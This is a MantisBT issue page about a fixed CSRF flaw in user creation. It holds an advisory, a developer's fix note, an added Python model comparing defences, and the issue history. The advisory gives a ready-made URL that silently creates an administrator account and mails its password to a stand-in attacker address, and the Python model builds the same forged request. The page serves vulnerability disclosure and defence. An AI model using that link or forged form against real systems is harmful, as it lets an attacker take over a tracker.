2014-11-28 17:41 EST

View Issue Details
ID: 0008995
Project: mantisbt
Category: security
View Status: public
Last Update: 2008-05-08 21:56
Reporter: thraxisp
Assigned To: thraxisp
Priority: normal
Severity: minor
Reproducibility: have not tried
Status: closed
Resolution: fixed
Product Version: git trunk
Target Version: 1.2.0a1
Fixed in Version: 1.2.0a1
Summary: 0008995: CSRF Vulnerabilities in user_create
Description:
Mantis Bug Tracker 1.1.1 Multiple Vulnerabilities

Name: Multiple Vulnerabilities in Mantis
Systems Affected: Mantis 1.1.1 and possibly earlier versions
Severity:
Impact (CVSSv2): (, vector: )
Vendor: http://www.mantisbt.org/
Advisory:
Authors: Antonio "s4tan" Parata (s4tan AT ush DOT it)
         Francesco "ascii" Ongaro (ascii AT ush DOT it)
B) CSRF Vulnerabilities

There is a Cross Site Request Forgery vulnerability in the software. If a logged-in user with administrator privileges clicks on the following URL:

http://www.example.com/mantis/manage_user_create.php?username=foo&realname=aa&password=aa&password_verify=aa&email=foo@attacker.com&access_level=90&protected=0&enabled=1

a new user 'foo' with administrator privileges is created. The password of the new user is sent to foo@attacker.com.

Tags: No tags attached.
Attached Files:

Relationships
child of 0008975 (closed, jreese): CSRF Vulnerabilities in user_create

Notes

~0017439
thraxisp (manager)

submitted to SVN r5132

Action pages are now qualified by checking for a POST command.
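The following is an added example, not MantisBT code and not part of the advisory or the fix in r5132. It models the manage_user_create action from the advisory and replays three constructed requests against it under three server-side policies: accept any method (the 1.1.1 behaviour described above), require POST (the qualification the note describes), and require POST plus a per-session anti-CSRF token. The token check, the `Mantis`/`Request` classes, the `form_token` field name and the example usernames are assumptions made for the demonstration; the access level 90 and the query string come from the advisory URL.

```python
"""Model of the manage_user_create.php CSRF issue and of two server-side checks:
the "POST only" qualification from the note, and a per-session anti-CSRF token
(an added hardening step, not something the page's fix describes).
Every request below is constructed for the example."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

ADMINISTRATOR = 90  # access level carried in the advisory URL

# The advisory's link and the plain action URL (hypothetical host, as in the advisory).
ADVISORY_URL = ("http://www.example.com/mantis/manage_user_create.php?"
                "username=foo&realname=aa&password=aa&password_verify=aa"
                "&email=foo@attacker.com&access_level=90&protected=0&enabled=1")
ACTION_URL = "http://www.example.com/mantis/manage_user_create.php"


@dataclass
class Request:
    method: str
    url: str
    session_user: str          # whom the browser's session cookie logs in as
    session_access_level: int  # that user's access level
    body: dict = field(default_factory=dict)  # POST form fields

    def params(self):
        """Action scripts read fields from the query string or the body alike."""
        merged = {k: v[0] for k, v in parse_qs(urlsplit(self.url).query).items()}
        merged.update(self.body)
        return merged


@dataclass
class Mantis:
    users: dict = field(default_factory=dict)        # username -> access level
    csrf_tokens: dict = field(default_factory=dict)  # session user -> token

    def issue_token(self, session_user):
        """Token the real admin form would embed as a hidden field (assumed name form_token)."""
        token = secrets.token_hex(16)
        self.csrf_tokens[session_user] = token
        return token

    def user_create(self, req, policy):
        """policy: 'any_method' (1.1.1), 'post_only' (r5132), 'post_and_token' (added)."""
        if req.session_access_level < ADMINISTRATOR:
            return "denied: not an administrator"
        if policy != "any_method" and req.method != "POST":
            return "denied: action pages accept POST only"
        if policy == "post_and_token":
            expected = self.csrf_tokens.get(req.session_user, "")
            supplied = req.params().get("form_token", "")
            # constant-time comparison; an empty expected token never matches
            if not expected or not hmac.compare_digest(expected, supplied):
                return "denied: missing or wrong anti-CSRF token"
        p = req.params()
        self.users[p["username"]] = int(p["access_level"])
        return f"created {p['username']} with access_level {p['access_level']}"


def run_scenario(policy):
    """Replay three requests by a logged-in admin against a fresh tracker; returns {label: result}."""
    app = Mantis()
    token = app.issue_token("admin")
    # Fields an attacker page would auto-submit in a hidden POST form; no token known to it.
    forged = {"username": "foo", "realname": "aa", "password": "aa",
              "password_verify": "aa", "email": "foo@attacker.com",
              "access_level": "90", "protected": "0", "enabled": "1"}
    # Fields the admin's own form submits, carrying the session token.
    legit = dict(forged, username="alice", email="alice@example.com",
                 access_level="25", form_token=token)
    requests = {
        "advisory GET link": Request("GET", ADVISORY_URL, "admin", ADMINISTRATOR),
        "cross-site auto-submitted POST": Request("POST", ACTION_URL, "admin", ADMINISTRATOR, forged),
        "legitimate POST with token": Request("POST", ACTION_URL, "admin", ADMINISTRATOR, legit),
    }
    return {label: app.user_create(r, policy) for label, r in requests.items()}


if __name__ == "__main__":
    for policy in ("any_method", "post_only", "post_and_token"):
        print(policy)
        for label, result in run_scenario(policy).items():
            print(f"  {label}: {result}")
```

Running it shows the practical caveat behind the fix: requiring POST stops the clickable link from the advisory, but a page under the attacker's control can submit an identical POST form with the victim's cookies attached, so the forged request still creates the administrator account under the "post_only" policy. Only the policy that also validates a secret bound to the session rejects it while still accepting the admin's own submission.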

Issue History
Date Modified     Username  Field                 Change
2008-03-22 22:01  thraxisp  New Issue
2008-03-22 22:01  thraxisp  Status                new => assigned
2008-03-22 22:01  thraxisp  Assigned To           => thraxisp
2008-03-22 22:01  thraxisp  Issue generated from  0008975
2008-03-22 22:01  thraxisp  Relationship added    child of 0008975
2008-03-22 22:09  thraxisp  Status                assigned => resolved
2008-03-22 22:09  thraxisp  Fixed in Version      => 1.2.0
2008-03-22 22:09  thraxisp  Resolution            open => fixed
2008-03-22 22:09  thraxisp  Note Added            0017439
2008-04-19 04:10  vboctor   Status                resolved => closed
2008-05-08 21:56  thraxisp  View Status           private => public